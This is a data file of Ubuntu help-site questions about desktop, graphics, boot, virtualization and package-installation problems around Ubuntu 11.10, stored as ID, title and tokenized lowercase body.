88467	how can i customize the unity top panel ?	how can i put the opened programs in the top bar to switch between them ? like xubuntu , kde , gnome classic , fallback ... but i 'm talking about unity . i need see/know what software i 'm using in some moment without need to use the large side bar of unity . i 'm left-hand and i ca n't use + all the time . i need alternate between the programs using the top bar without a bar that group the same programas ( as the unity sidebar do it ) . i ca n't believe canonical did n't think about the big free space in the top bar ( just have the clock , system tray and some icons ) . i installed myunity but i ca n't change anything about top bar . i know the top bar is the app menu . i just want the opened programs without use the sidebar . the sidebar group the same window . where can i mark to never group ? myunity and compizconfig setting manager do n't have this option .
88468	1920x1200 resolution shows black area on bottom right	i just bought a new 27 inches monitor , i plugged it in and ubuntu started with my old monitor resolution ( 1440x900 ) . so i went to the nvidia-xconfig ( the default config tool wont work because i use a nvidia card ) , i set the resolution to auto and it selected 1920x1200 ( i also tried selecting it manually and other resolutions higher than 1440 , the problem is the same ) , but on screen the monitor only seems to be showing a 1440x900 rectangle and the rest of the screen ( right bottom ) is black , here 's a screenshot : http : //i.stack.imgur.com/z4gqn.png any resolution higher than 1440x900 have this problem , i have also tried pressing the `` auto adjust '' button on the monitor but that wont work . i am using ubuntu 10.04 with kernel 2.6.32-35-generic . any ideas how to solve it ? update : here 's my xorg.conf : http : //pastebin.com/2egqa65p ( it looks like it still have the settings for the 2 monitors from when i have them both connected , but now i have only the 27 inches one plugged in since a few days , i 'd like to use both monitors at the same time but first i want the new one to work fine on full res ) new monitor : samsung p2770h ( 27 inches ) old monitor : lg l192ws ( 19 inches ) video card : xfx 8600gt nvidia driver version : 195.36.24 also wanted to add that the mouse cursor can move over the black area without disappearing . update2 : i went into nvidia-xconfig and changed the resolution to 1920x1200 , then i clicked `` save to x configuration file '' , and unchecked the `` merge with existing file '' checkbox , this is the xorg.conf file created : http : //pastebin.com/rvrbdav4 after this i used `` sudo restart gdm '' , and when the login splash appeared it was in 1920x1200 ! , i was so happy , but then i logged in , and the screen changed to 1440x900 ( screen filled , no black borders ) . nvidia-xconf shows 1440x900 as the current resolution but xorg.conf still has 1920x1200 set . what could be forcing the resolution to change after i login ? ( solved ) update3 : what was changing the resolution was monitors.xml file , i edited it using the values 1920x1200 , and this time after login the resolution does n't change but the black border like in the screenshot appears . so the problem is still the black border in the bottom right . update4 : i found the cause ! , if i kill compiz the resolution works fine so i went to system > preferences > appearance > visual effects , and selected none . now it works fine ! . i am still curious what 's causing it , i set it to normal and the problem occurs , i then went to compizconfig settings manager and deselected all the effects , but the problem persists , the only workaround i found is setting the visual effects to none . what else could i try to find the real root of the problem ? because i am still having some problems like when i put the mouse hover the shutdown tray icon all the icons changes positions and also colors , it 's really weird .
88470	need recommendation for upgrading from 10.10 to 11.10	i 'm ready to finally move from 10.10 to 11.10 . i have cloned my existing drive with clonezilla , so i have a good backup image . my current drive is separated into separate partitions with home and data all separate ( somewhat of a legacy setup from when i dual booted ) . my home and data partitions are rsynced regularly to a nas . i 've definitely done plenty of tweaking and installed lots of apps , and would like to have an easy way of at least keeping track of what i need to reinstall . process wise , what are the recommendations . i 'm prepared to not do an upgrade ( especially since i would have to do it twice -- 10.10 -- > 11.04 -- > 11.10 . below is a snapshot of my current partition scheme .
88471	can i set a time-out for auto-mounted shares that are unavailable ?	i am using autofs to mount an nfs remote share at boot so it 's mounted when i 'm logged in . if the remote share is down , i ca n't login to ubuntu , it hangs after entering my password . any way to set a timeout on the remote share so it forgets about mounting an unavailable share after n seconds and lets me login ? if not with nfs , then with sshfs ?
88473	wubi boot configuration error	i 've recently been trying to install wubi ubuntu version 11.10 on my win7 x64 laptop . it has , however , been failing to work . the installation itself seems to work fine , but at the very end , i get the following error : an error occurred : error executing command > > command=c : \windows\sysnative\bcdedit /create /d ubuntu /application bootsector > > retval=1 > > stderr=the boot configuration data store could not be opened . the system can not find the file specified . > > stdout= for more information see the log file : ..\local\temp\wubi-11.10-rev245.log this sucks . i proceeded to google this error , and found wubi installer error : the boot configuration data store could not be opened , which details the exact same problem . however , i do n't have any 100 meg partitions , nor any secret partitions , nor any partitions without drive letters . i do n't even have c : \boot folder ( which is odd ) , and win7 says it has no recoveries needing to be made . i tried reinstalling or repairing win7 itself , thinking that perhaps that was the source of the glitch , but to no avail . please , someone help me .
88476	graphics driver for intel mobile 4 chipset	i have the following graphics chipset : 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) seems my driver is not configured properly for this in ubuntu 11.04 as seen from http : //ubuntuforums.org/archive/index.php/t-995829.html and http : //stackoverflow.com/q/8545291/781188 how can i get glx extension to work on ubuntu 11.04 ?
88477	is it possible to add a desktop in ubuntu 11.10 ?	by default ubuntu 11.10 has 4 desktops . i want to add two more desktops ( i want to obtain a 3x2 grid ) . is it possible ? how to do it ? thank you in advance .
88480	adding extra options to right-click menu	are any more options that can be added to the right click menu in ubuntu ? e.g when right clicking in nautilus or desktop
88487	problem with installing gnome shell : unmet dependencies	when i tried to install gnome shell ( using ubuntu software center ) this error showed up . the message says : package dependencies can not be resolved this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . here the dependencies : the following packages have unmet dependencies : gnome-shell : depends : libpulse-mainloop-glib0 ( > = 1:0.99.1 ) but 1:1.0-0ubuntu3 is to be installed depends : libpulse0 ( > = 1:0.99.1 ) but 1:1.0-0ubuntu3 is to be installed depends : libxfixes3 ( > = 1:5.0 ) but 1:5.0-4 is to be installed so can you help me install gnome shell ?
88489	the system drops to a grub prompt on boot after an update . how do i fix this ?	the day before yesterday , i opened ubuntu . i always go to the update manager first . after i loaded the updates and tried to re-start , i got a command line prompt saying grub_ . i have never encountered any thing like this before . the only way that i can get out of grub_ is to disconnect all the power going to my compaq laptop . is there a way to fix this ? i am running 11.10 .
88495	where is the xcompmgr file located ?	i 'm on lubuntu 11.10 . i 'd like to add xcompmgr as part of my autostart programs on logon ( to use it in combination with docky ) . i know all i have to do is to copy its icon into my /home/myname/.config/autostart . problem is , i ca n't locate xcompmgr . i 've looked in /usr/share/applications , to no avail . where could i find it ?
88498	nautilus crashes when expanding /downloads folder	also rooted nautilus crashes at the same point . i have removed profiles of nautilus and all suspect files i have downloaded before . there is no error output in the console also no logs in /var which reffering to the crash . i saw that lot of people have the same issue but any solution fits to me . thank you fo help
88500	can i divide a monitor so that windows only open to 1/2 of the monitor width ?	background : i have just installed two 24 '' monitors , but this question is about the behavior of each monitor . the aspect ratio of these monitors is much wider than i need , and i would prefer to be able to have four programs open at once , without having to resize each frame . question : can i configure ubuntu so that an applications open to 1/2 of the screen width by default , and use 1/2 of the screen for 'full screen mode ' ? i would prefer a solution that does not depend on unity , although any solution would be welcome . current setup : desired setup : ( except that programs are not using full screen in this example ) system details dell optiplex 755 graphics card : radeon hd 2400 xt os : ubuntu and xubuntu 11.10 software : amd catalyst control center
88503	webcams not detected	i 've installed ubuntu last version and have problem with webcam , it 's invisible for computer , all usb ports are active , but webcam seems to be dead . tried 2 creative cams , no one of these were working . getting message `` webcams not detected '' ... any ideas ?
88505	sound not working on hp touchsmart 300	the sound is n't working on my machine . changing audio settings does n't help . ati technologies inc sbx00 azalia ( intel hda ) ubuntu 11.10 the pc itself is a touchsmart 300-1125uk .
88508	gma 3150 change resolution permanent ?	i recently bought a shuttle x35v2 with gma 3150 graphics ( great computer for the money ) . when i connect my monitor ( native 1360x768 ) in only get two resolutions to choose from , 1024x768 and 800x600 . i have understand that gma 3150 with no problems can show resolutions up to 2048x1536 with no problem . i have tried to use xrandr to change resolution to 1360x768 and it works very well . but , i have not succed to set it to this resolution permantly , when i reboot it still set to 1024x768 . i also have a asus eee pc 1001px with gma3150 . i have the same problem when i connect a monitor with high resolution to it so , to my question : how do i get 1360x768 permantly on my gma 3150 graphics with ubuntu 11.10 ? regards magnus
88509	how do i get shotwell to stretch small pictures to fill the screen in fullscreen mode ?	if i have an image in shotwell that is smaller than my screen 's resolution , i would like it to be stretched to fill the screen when i am viewing images in fullscreen mode , like it is in eye of gnome and in damn near every other app with a fullscreen mode i 've ever used . but there does n't seem to be an option to do this in shotwell .
88510	why does rc.local not run this script ?	i need to run a script at startup , the script needs to run under a certain user , not as root , i tried adding the script to /etc/rc.local like this : # ! /bin/sh -e # # rc.local # # ! /bin/sh su - tue -c `` /home/tue/main '' su - tue -c `` /opt/craftbukkit/start.sh '' the first line starts a program main in /home/tue , this is working fine . the second line is my script , but for some reason this is n't being run ?
88514	how can i improve battery life on an eeepc 1015 pem ?	i own an asus eee pc 1015 pem . i 've decided to fully shift to ubuntu , i 've been using it on other systems since the 5th release , so i 'm very well familiarized with ubuntu . even though i 'm very happy with the os , i 've been noticing 2 things : one is that my battery life is almost only half of what i got with windows , the second is that most of the time the core temperature goes around 55ยบ c. i 've installed jupiter , and added the `` quiet splash pcie_aspm=force '' , i have also installed the scripts to slow down disk speeds when running on battery , and still i ca n't get more than 6 hours of battery life , while on windows i used to get from 9 to 10 ours . i want to know if there are is anything else that i can do to make my battery last longer and make my computer temperature come a little lower ?
88516	is it possible to make my system not suspend when playing music and video ?	my friend wanted to know if it is possible to get a patch that would allow him to set his computer to not suspend when he is using a video or music player , to include being on youtube ? i wouldnt mind the same patch . he is on a toshiba and runs ubuntu 11.10 . i am on a hp and run ubuntu 11.10 .
88519	how to keep launcher on top ?	it takes too long to show the launcher , and i work faster when it is always visible . therefore i would like to keep it on top . is this possible ?
88521	reproduce playlist from terminal in banshee	that 's it , how can i play a specific playlist from terminal in banshee ? i 've seen the -- help pages and it did n't help much , so i wanted to know if anyone here knew it . is it useful ? for me it is , i 'd use `` remote launcher '' ( android ) to reproduce playlists faster and without a need for a screen . thanks
88523	creating a mount point if it does not exist	when using the mount utility , if you specify a directory that does not exist , that is considered an error . is there any option i can use so that mount points get automatically created if they do n't already exist ?
88528	how to switch on sub-pixel anti-aliasing for fonts ?	in fedora 16 ( gnome ) i did it without any problems . but in ubuntu 11.10 ( gnome ) in system settings - > appearance i ca n't see any tab for fonts settings .
88541	ca n't boot xubuntu session after installing lubuntu then xubuntu-desktop	i installed xubuntu-desktop over lubuntu-desktop in ubuntu oneiric . now : 1 ) it 's not possible to log into xubuntu - after entering name and password it just loops back to the login screen . 2 ) after a gnome login no panels appear , making it rather difficult to do what i wanted to do in gnome ( namely remove the lubuntu install to see if that made xubuntu usable ) 3 ) attempting to remove the xubuntu install from lxde ( with the code from psychocats ) results in this output : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : autoconf : depends : m4 ( > = 1.4.13 ) but it is not going to be installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . i 've asked about the first problem on the ubuntu forum , where someone else has also reported it , without any reply so far . needless to say , this is a very frustrating situation ...
88546	how can i get google chrome multitouch support like in os x ?	in os x google chrome , swiping left or right with two fingers goes forward or back in the history . i 've been trying to use synaptics and touchegg to do this but ca n't seem to figure it out . how can i emulate this behavior in ubuntu ? i have a macbook air .
88552	can not access files in any folder on samsung galaxy sii	when i connect my samsung galaxy sii with usb cable my dcim folder looks empty although i can see my files on phone . do you have any idea what would be the problem ? on computer : on phone :
88554	what values are available for fn and fb options to the xterm command ?	i am visually impaired and have difficulty with the current settings ( 9x15 and 9x15bold ) which my script is specifying . i would like to enlarge the fonts ; how do i determine which values are possible for the fn and fb options ? in other words , i know that xterm is invoked like this : xterm -fn 9x15 -fb 9x15bold ... i would like to increase the font size , but do not know how to determine what options are available nor how to ( perhaps ) increase the options available .
88555	problem in running eclipse from the shortcut in ubuntu 11.10	i have installed ubuntu 11.10 on my machine and i recently installed eclipse on it . well , from the command line it is running fine but when i made shortcut for it on desktop it is giving me error something like this '' a java runtime environment or java development kit must be available in order to run eclipse . no java virtual machine was found after searching the following locations : /home/aaaaa/eclipse/jre/bin/java java in your current path '' . i have set path environment variable very well and i have also tested `` javac '' and `` java '' command through terminal . they both are working fine . now in order to make my shortcut work what setting i have to make additionally ?
88557	getting error from apt-get when trying to install php5 package	i am new in ubuntu and i try to run a website by my own computer but i ca n't install php5 . when i typed : sudo apt-get install php5 i received : package php5 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'php5 ' has no installation candidate what does it mean ?
88560	referenced previous command 's output	suppose you are in following situation : < command 1 > < output of command 1 > < want to use output of command 1 here without have to retype it > my specific case : which eclipse /usr/bin/eclipse ldd /usr/bin/eclipe but i would prefer not to have to type this last line out , is there any shortcut ?
88561	is 45 deg c too high for cpu temp ?	i 'm running ubuntu 11.10 on sony vaio intel i7 quad core . i have a cpu temp of about 45 deg c. when i used windows 7 , the temp was about 30 deg c. is 45 normal for ubuntu ? edit : more specifically : intel® core™ i7 cpu m 640 @ 2.80ghz × 4
88568	is it possible for a directory to change permissions of the files that are added to it ?	i have a directory and i want all files that are put in it to have the permissions of **5 . in other words i want the permissions of the owner and group to stay the same but the permission to be read and execute for all other users . is this possible ? i know i can periodically set the permissions of all the files in this folder but i was wondering if there was a way to automate it .
88570	eclipse ca n't find jdk 7	i 've got oracle jdk 7 installed javac -version yields javac 1.7.0 and the jre is installed and enabled in eclipse > preferences > installed jres ( as location : /usr/lib/jvm/jdk1.7.0 ) but trying to change preferences > compiler > compiler compliance level shows no options above 1.6.0 i 'm a novice to ubuntu ... does anyone have any ideas what i 've got wrong ? i followed the instructions from how do i install oracle java jdk 7 ? screenshot of eclipse.ini and /usr/lib/jvm/jdk1.7.0 : http : //dl.dropbox.com/u/10919879/screenshot.png
88573	how do i remove ati/amd drivers downloaded from their site ?	i downloaded ati drivers from amd 's site , installed , but found that they dont work with gnome shell . now i want to remove it . how do i do that ?
88574	one hand keyboard layout	i would like to change my keyboard so it types similarly to this demo . http : //half-qwerty.com/demo/ unfortunately i 'm slightly lost on how to implement an alternative keyboard layout with the spacebar as a toggle . thanks !
88576	why am i unable to connect to my ec2 instance with juju ?	i 'm using juju to boostrap and then deploy a service . i was able to create an instance before and deploy it , but after a few creations and deletions i am now unable to connect , ie run juju status . running juju -v status gets me this , any ideas ? : juju -v status 2011-12-17 18:12:21,682 debug initializing juju status runtime 2011-12-17 18:12:21,724 info connecting to environment ... 2011-12-17 18:12:22,396 debug connecting to environment using ec2-50-19-139-160.compute-1.amazonaws.com ... 2011-12-17 18:12:22,397 debug spawning ssh process with remote_user= '' ubuntu '' remote_host= '' ec2-50-19-139-160.compute-1.amazonaws.com '' remote_port= '' 2181 '' local_port= '' 52821 '' . 2011-12-17 18:12:23,407:4475 ( 0x7fbfd3999720 ) : zoo_info @ log_env @ 658 : client environment : zookeeper.version=zookeeper c client 3.3.3 2011-12-17 18:12:23,407:4475 ( 0x7fbfd3999720 ) : zoo_info @ log_env @ 662 : client environment : host.name=shinyo 2011-12-17 18:12:23,407:4475 ( 0x7fbfd3999720 ) : zoo_info @ log_env @ 669 : client environment : os.name=linux 2011-12-17 18:12:23,407:4475 ( 0x7fbfd3999720 ) : zoo_info @ log_env @ 670 : client environment : os.arch=3.0.0-15-generic 2011-12-17 18:12:23,407:4475 ( 0x7fbfd3999720 ) : zoo_info @ log_env @ 671 : client environment : os.version= # 24-ubuntu smp mon dec 12 15:23:55 utc 2011 2011-12-17 18:12:23,408:4475 ( 0x7fbfd3999720 ) : zoo_info @ log_env @ 679 : client environment : user.name= ( null ) 2011-12-17 18:12:23,408:4475 ( 0x7fbfd3999720 ) : zoo_info @ log_env @ 687 : client environment : user.home=/home/shazzner 2011-12-17 18:12:23,408:4475 ( 0x7fbfd3999720 ) : zoo_info @ log_env @ 699 : client environment : user.dir=/home/shazzner 2011-12-17 18:12:23,408:4475 ( 0x7fbfd3999720 ) : zoo_info @ zookeeper_init @ 727 : initiating client connection , host=localhost:52821 sessiontimeout=10000 watcher=0x7fbfd180d650 sessionid=0 sessionpasswd= < null > context=0x1a7c8d0 flags=0 2011-12-17 18:12:23,409:4475 ( 0x7fbfcdb0f700 ) : zoo_info @ check_events @ 1585 : initiated connection to server [ 127.0.0.1:52821 ] 2011-12-17 18:12:23,844:4475 ( 0x7fbfcdb0f700 ) : zoo_error @ handle_socket_error_msg @ 1603 : socket [ 127.0.0.1:52821 ] zk retcode=-4 , errno=112 ( host is down ) : failed while receiving a server response 2011-12-17 18:12:27,178:4475 ( 0x7fbfcdb0f700 ) : zoo_warn @ zookeeper_interest @ 1461 : exceeded deadline by 436ms 2011-12-17 18:12:27,178:4475 ( 0x7fbfcdb0f700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:52821 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client 2011-12-17 18:12:30,515:4475 ( 0x7fbfcdb0f700 ) : zoo_error @ handle_socket_error_msg @ 1579 : socket [ 127.0.0.1:52821 ] zk retcode=-4 , errno=111 ( connection refused ) : server refused to accept the client edit solved : i managed to fix my connection problems by regenerating my environments.yaml file , by deleting it and running juju bootstrap again .
88584	how to install rabbitmq management plugin ( rabbitmq-plugins ) ?	brief : is there a way to install rabbitmq-plugins via a ubuntu package ? details : i have rabbitmq running ok in my ubuntu system , and now i 'm trying to monitor what 's going on via the management plugin . i 'm following rabbitmq.com/management.html instructions , but ca n't execute rabbitmq-plugins enable rabbitmq_management because my system does not have rabbitmq-plugins installed . it 's ubuntu 11.10 , and came with rabbitmq installed as a package ( aptitude install rabbitmq-server librabbitmq-dev ) . the config and the server are running fine ( the installed version is 2.5.0 ) . thought that the plugin would get installed by installing `` sudo aptitude install rabbitmq-plugins-common '' , but doing that does not install rabbitmq-plugins . is there a package that will install the plugin ? i 'd like to avoid if possible having to purge the rabbitmq server that is running ok , and then reinstall it via a download + build from source , all just to get the plugin .
88589	run command at boot as root	i need to run a bash script at boot-time as superuser in xubuntu . i do n't know where to start . i have to do something described in a arch linux guide . that guide says exactly : add following at the end of the file : /etc/rc.sysinit # do my action /etc/rc.d/do_my_action /bin/dmesg > | /var/log/dmesg.log but i do not have /etc/rc.sysinit and /etc/rc.d/ in xubuntu . i 'm sure there are equivalent ones , right ?
88597	controlling where an opened window appears	i often find myself opening emacs from the terminal in order to copy down something from the internet . regretfully , the thing i am usually attempting to copy down is in the upper left-hand portion of the screen - precisely where the emacs window opens . how might change things so that emacs opens in the upper right-hand portion of the screen ? i 'm using unity-2d so compiz can not be used . any other way to do it ?
88598	screen resolution too small	i loaded 11.10 onto an older dell laptop . i have a normal 1024 x 768 resolution when booting from a usb drive , but when i boot from the installation on the hard drive i have a small screen in the upper left hand corner . the resolution is at 800 x 600 with no other choices in the settings display . any ideas
88600	how to display the number of frames per second in mplayer	is there a command ( either a command line option , or a navigation command ) to display the number of frames per second of the playing movie ? i am testing to see if my computer is slow ( ie running at less than 30 fps ) or if the video was sampled poorly . note : i did try to 'google it ' , but googling for 'mplayer ' and 'fps ' returns how to set the desired number of frames per second .
88606	wireless troubles with intel 3945abg	please help ! i can not connect to wireless it shows my connection i enter password and yes its the right one im sure of it then it trys to connect and can not . then about 30 second or so later it trys again automatically . ive looked at other forums and ive tried everything nothing works . also i submitted this a few days ago but no answers but i have more information can someone please help here 's what i get from the terminal . here 's new information after uninstall and reinstall .
88609	how to prevent nautilus from launching in xubuntu ?	i installed both gnome/unity and xfce on my desktop , and i use xfce ( xubuntu ) as default when i log in . but every time i log in , nautilus launches by opening a folder and changing my wallpaper . the weird thing is that it 's not even in `` start-up applications '' . how to prevent nautilus from launching in xubuntu ? so far , i 'm just doing killall nautilus every time i log in .
88611	upgrade to recent release of ubuntu from 10.04 on dual os	i have dual os ( rhel 5.4 & ubuntu 10.04 ) installed on my system . now , i want to upgrade to 11.10 or 12.04 . how can i upgrade using update manager ? will that affect my dual os boot ?
88612	problems setting up vpn on 11.10	hi i am trying to use a cisco vpn client and having trouble . when the client is running , i get no data coming in and only a trickle going out . network manager is installed but my connection is 'not managed ' ( pppoe connection ) . i think / thought it might be my dns , as ping does not work at all , so i try to change the dns nameservers to google dns in /etc/resolv.conf , and there are two problems here : network manager conveniently replaces my changes with each restart ( and changing does n't do any good anyway prior to restart ) i get weird errors : ( gedit:2976 ) : gtk-warning ** : attempting to store changes into `/root/.local/share/recently-used.xbel ' , but failed : failed to create file '/root/.local/share/recently-used.xbel.wi6i6v ' : no such file or directory ( gedit:2976 ) : gtk-warning ** : attempting to set the permissions of `/root/.local/share/recently-used.xbel ' , but failed : no such file or directory could someone pls tell me how i can troubleshoot these problems ? i have the same service set up fine on an old box at work running 9.10 ... and should i be trying to change the dns settings at the router ? i am really not sure .
88613	`` gconf-2.0 > = 2.8.0 not satisfied '' error when installing nautilus action-3.1.5 from source	i use ubuntu 11.10 . i 've tried to install nautilus action-3.1.5 with the software centre . it 's been installed but does n't start at all . then i 've tried to install nautilus action-3.1.5 from source but when i do ./configure -- with-gtk=3 -- with-default-io-provider=na-desktop -- disable-gconf there is a problem with gconf : checking for gconf ... no configure : error : gconf : condition gconf-2.0 > = 2.8.0 not satisfied the same error 's signalled if i do the simple command ./configure without paramethers . what can i do ?
88614	how do increase the swap size of my wubi installation ?	i have installed ubuntu using the wubi installer . so i have the default swap size of only 256mb . i have 1gb of ram , so many times the system stars crying demanding more swap . i have read the swap faq , but i 'm still not sure about how to increase swap size when ubuntu is installed using wubi .
88624	change workspaces layout in unity 2d	i was using a workspace layout or 1 row and 5 columns , but with the latest update of unity 2d , now my 5 workspaces are splited in 2 rows . how should i revert the layout workspace back to 1 row ? many thanks !
88626	ubuntu ca n't find the correct max resolution with samsung syncmaster sa300	i decided to install ubuntu also on my desktop pc ( windows has been exorcised from my life ) but i am having some problems i did n't have with previous hardware configurations . my display is a samsung syncmaster sa300 , on windows vista the maximum resolution ( 1920x1080 ) worked well , but now , ubuntu ( after installing fglrx drivers ) tells me that the maximum resolution is 1600x1200 i googled a lot last night , and i found a lot of people solving this ( on different displays though ) with xrandr . i was not able to do it , because xrandr keep complaining `` you goddamn maximum resolution is 1600x1600 '' . what xranrd clean command say is : mattia @ fatdesktop : ~ $ xrandr screen 0 : minimum 320 x 200 , current 1600 x 1200 , maximum 1600 x 1600 dfp1 disconnected ( normal left inverted right x axis y axis ) crt1 disconnected ( normal left inverted right x axis y axis ) crt2 connected 1600x1200+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1600x1200 60.0*+ 1400x1050 60.0 1280x1024 60.0 47.0 43.0 1440x900 59.9 1280x960 60.0 1280x800 60.0 1152x864 60.0 47.0 43.0 1280x768 59.9 56.0 1280x720 60.0 50.0 1024x768 60.0 43.5 800x600 60.3 56.2 47.0 720x576 50.0 720x480 60.0 640x480 60.0 tv disconnected ( normal left inverted right x axis y axis ) cv disconnected ( normal left inverted right x axis y axis ) then according to other internet posts and forums : mattia @ fatdesktop : ~ $ cvt 1920 1080 60 # 1920x1080 59.96 hz ( cvt 2.07m9 ) hsync : 67.16 khz ; pclk : 173.00 mhz modeline `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync so now i have to add that modeline mattia @ fatdesktop : ~ $ xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync mattia @ fatdesktop : ~ $ xrandr -- addmode crt2 1920x1080_60.00 and here comes the pain : mattia @ fatdesktop : ~ $ xrandr -- output crt2 -- mode 1920x1080_60.00 xrandr : **screen can not be larger than 1600x1600 ( desired size 1920x1080 ) ** see ? screen can not be larger than 1600x1600 ( desired size 1920x1080 ) at this point , the 1920x1080 option appears inside the resolution choice menu ( the graphical one ) . but last night , when i tried to select it , my screen went black , and i had to power off the pc . any clues ? am i on the wrong path ?
88627	recommend me a serious work pc spec	can someone please recommend me a pc spec for serious work purposes . i am not asking for shopping advice , i am just asking for recommended spec details . once i have the spec details , i can go and try finding the best products/prices matching/or getting close to the recommended spec details given by answers here . i need a pc which can comfortably do the following run 9+ 1gb virtual machines at any given time run gimp and render imagery fast load , run eclipse fast and process code fast mysql workbench should run fast http : //www.sumopaint.com/app/ should not lag http : //www.homestyler.com/designer should not lag at the moment , i have a cpu : pentium d 3.0ghz ram : 3gb gpu : built into motherboard which only lets me run about 2 1gb vms at ones , gimp is really slow as is eclipse and mysql workbench . also the 2 flash based apps are extremely laggy . what spec would you recommend so i can run the above without any lag issues , get gimp to render fast and eclipse to work fast , and the flash apps to run without lag , including 4 monitors to give me a large desktop ?
88628	how can i avoid the pc from shutting down from heat	i seem to be having an odd sort of problem . with my hp , i 've been running great from last december on the different ubuntus that were made available over this year . but it would seem , that since 11.10 ( although i am not quite sure , it started around 10th november ) , i have the odd temperature problem , stopping my computer from responding and just going into a full-on fan-run - and the only way out is to hard-reboot the pc . now i know this sounds like a hardware issue . this is also why i sent in the pc to hp , and after a month of repairs , the only thing hp has done is reinstall their win7 mix , filled with ads , but i was n't all sure . so i tried not to complain too much , and reinstalled ubuntu , but less than a day into it , the pc started shutting down again if used `` normally '' ... chrome and skype at the same time for example . i also decided to have a test with win7 , which i left in dual , and there , it does n't seem to be a problem , even if i open quite a few more programs to fiddle with ... i installed 2 bits to measure temperature , and it would seem that at around 62-63 , it shuts down . my question ( finally ) would be if there is any way to change the maximum temperature ( unless 63째 was a normal max temperature ) , or a way to reduce energy consumption in some way so that it does n't force me to reboot the moment i use 2 programs ... thanks a bunch for your help ! bisi
88632	how do i use command line arguments in bash ?	this script moves all the doc files to a specified directory . i have managed to put an argument but the problem i am facing is putting the full path where the scripts are moving to , for example i want to run the script like this below ./loo -d then path where im moving the files ( i.e ./loo -d the second argument where files are moving to ) this is my code # ! /bin/bash from= '' /home/elg19/lone/doc '' to= '' /home/elg19/documents '' if [ $ 1 = -d ] ; then cd `` $ from '' for i in pdf txt doc ; do find . -type f -name `` *. $ { i } '' -exec mv `` { } '' `` $ to '' \ ; done fi
88636	do all webcam programs depend on 3d acceleration in virtual box ?	i 'm trying to use my webcam from an ubuntu virtual guest . when i start cheese from a terminal , it tells me that it depends on 3d acceleration . are there alternative ways to test a webcam that do n't depend on 3d acceleration ?
88640	how can i determine which software repositories are in active use ?	i added some custom repositories sometimes ago . how can i determine , which software i have installed is from them ? i want to delete unused repos .
88647	how do i increase the hard disk size of the virtual machine ?	i have run out of space on my winxp virtual machine , which i only gave 10 gb space for when i created it . is there an easy way to increase it to , say , 20 gb ? i ca n't see any obvious option in virtualbox settings . the suggestion below gives this error wim @ wim-ubuntu : /media/data/winxp_vm $ vboxmanage modifyhd wim.vdi -- resize 20000 vboxmanage : error : can not register the hard disk '/media/data/winxp_vm/wim.vdi ' { 46284957-2c09-4e70-8a49-bfbe0f7f681d } because a hard disk '/home/wim/virtualbox vms/winxp_vm/wim.vdi ' with uuid { 46284957-2c09-4e70-8a49-bfbe0f7f681d } already exists vboxmanage : error : details : code ns_error_invalid_arg ( 0x80070057 ) , component virtualbox , interface ivirtualbox , callee nsisupports context : `` openmedium ( bstr ( pszfilenameoruuid ) .raw ( ) , enmdevtype , accessmode_readwrite , fforcenewuuidonopen , pmedium.asoutparam ( ) ) '' at line 210 of file vboxmanagedisk.cpp removing the .vdi from virtualbox before calling vboxmanage command , then adding it back in , was successful . but now i ca n't boot the virtual machine , i get this worrying screen : by the way , it says fatal : could not read from the boot medium ! system halted . the vdi must be reattached to the vm after vboxmanage command . further , the partition will need to be resized from within windows , because you will have this empty space : i was able to resize the partition easily using a bit of freeware called easeus partition master 9.1.0 home edition .
88655	how come ubuntu is slowed down even after all resource-hungry apps have exited	i have been wondering this for quite a while , thought i might give a shot asking it here . scenario : i use an application that used a lot of resources ( for example image batch processing or compiling/running a lot of apps ) close the resource-hungry apps ubuntu still significantly slower than before the resource-hungry apps were started* * i mean , 'top ' indicates low cpu usage , until i do something ( as trivial as opening a tab or something ) and my cpu usage spikes instantly . i noticed this on a multiple of ubuntu boxes i own . a reboot is the only solution i found . what 's the reason behind this ? edit : a bit more info about my laptop : dell studio 1558 , intel i5 , 8gb ddr3 ram , 7200 rpm hdd
88660	toshiba p755 s5260 keyboard led backlight wo n't light up	i have a toshiba satellite p755-s5260 with the led backlit keyboard with shortcut keys above the keyboard that are also supposed to light up . the led 's are enabled in the bios and work up until ubuntu boots up . any suggestions ?
88670	apparmor does n't work with 3.1.5-pf kernel	i have update manually the kernel on ubuntu 11.10 and now i have this messages on boot : cache read/write disabled : /sys/kernel/security/apparmor/features interface file missing . ( kernel needs apparmor 2.4 compatibility patch . ) the kernel version is 3.1.5 with -pf patchset and apparmor enabled in kernel config ? any suggestions ?
88677	installer stuck at `` configuring target system '' step	i am trying to install 11.10 and it keeps getting stuck on the `` configuring target system '' step . i originally downloaded the program to a usb drive and copied it to the desktop for installation .
88681	dell n4110 touchpad suddenly stopped working	i am using ubuntu 11.10 64 bit and my touchpad on dell n4110 suddenly stopped working . i have checked the mouse and touchpad settings and the touchpad is not disabled . what should i do ?
88686	fan is always on on a toshiba l300 , is this normal ?	i 've installed ubuntu 11.10 on my toshiba l300 and i have a problem with the fan which works constantly and this is unusual ... have you got the solution ?
88689	how can i have an applications menu in nautilus right click lke xfce has ?	how can i have an applications menu in nautilus right click like xfce has ? i think that is so smart and useful .
88692	how to install wink ?	i ca n't install wink by the following commands : sudo apt-get install wink here is the log sam @ sam : ~ $ sudo apt-get install wink [ sudo ] password for sam : reading package lists ... done building dependency tree reading state information ... done package wink is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'wink ' has no installation candidate what is 'referred to by another package ' ? where is that package ? how to install wink ? the method using apt-get is the better than download from website . thank you~
